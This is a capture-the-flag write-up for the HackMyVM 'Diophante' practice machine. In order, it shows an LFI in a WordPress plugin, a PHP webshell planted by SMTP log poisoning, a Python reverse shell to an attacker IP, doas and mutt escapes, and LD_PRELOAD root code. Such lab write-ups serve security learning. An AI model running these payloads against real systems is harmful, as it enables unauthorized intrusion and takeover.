https://hackmyvm.eu/machines/machine.php?vm=Diophante
Scan ports, noticed port 25 maybe open, it's smtp service.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Dir scan port 80.
Check note.txt, it's a hint about knock-knock.
Do knock-knock.
knock 192.168.56.100 7000 8000 9000
Scan ports again, the port 25 is now open.
In /blog folder, check source code, we need to add "hard" to /etc/hosts.
Then we can correctly visit the wordpress blog.
Use wpscan to check the wordpress blog.
wpscan --url http://hard/blog -e u,p --no-banner
It's a classic wordpress plugin vuln. Search exploitdb for the poc code.
Check if the LFI is ok.
~ curl 'http://hard/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd' --output - root:x:0:0:root:/root:/bin/bash ... sabine:x:1000:1000:sabine,,,:/home/sabine:/bin/rbash ... leonard:x:1001:1001:,,,:/home/leonard:/bin/bash ...
Now we need to get reverse shell. Remember we have smtp open, so we can send a mail to sabine or leonard, with shell code in it, then use LFI to include it.
We use nc to connect port 25, and send a mail to leonard.
~ nc 192.168.56.100 25 220 debian ESMTP Postfix (Debian/GNU) helo somebody 250 debianmail from:"somebody" 250 2.1.0 Ok rcpt to:leonard 250 2.1.5 Ok data 354 End data with <CR><LF>.<CR><LF> <?php system($_GET["pass"]) ?> . 250 2.0.0 Ok: queued as 0F4BE802CC quit 221 2.0.0 Bye
Check if our shell code works.
curl 'http://hard/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/leonard&pass=id' --output -
Now we can use nc to listen at some port, then get reverse shell by visit:
http://hard/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/leonard&pass=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.150",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Check SUID file. xclip is rabbit hole (I spent a lot time on it :P) ,we need doas.
Check doas.conf.
Now we can escalate to user sabine from www-data.
doas -u sabine /usr/bin/setsid bash
We upload id_rsa.pub to /home/sabine/.ssh/authorized_keys, then we can login ssh as sabine, remember to add '-t "bash --noprofile"'.
Next step is also use doas to escalate to user leonard.
Mutt is a email client. In mutt, press "m" to write a mail, and when writing the content the the mail, we get nano. So we can use nano to get a shell.
Upload id_rsa.pub again, we get full ssh terminal.
Sudo -l, notice the LD_PRELOAD.
In /tmp folder, create pwn.c with code below.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}Compile it to pwn.so.
gcc -fPIC -shared -o pwn.so pwn.c -nostartfiles
Last step is to get root.
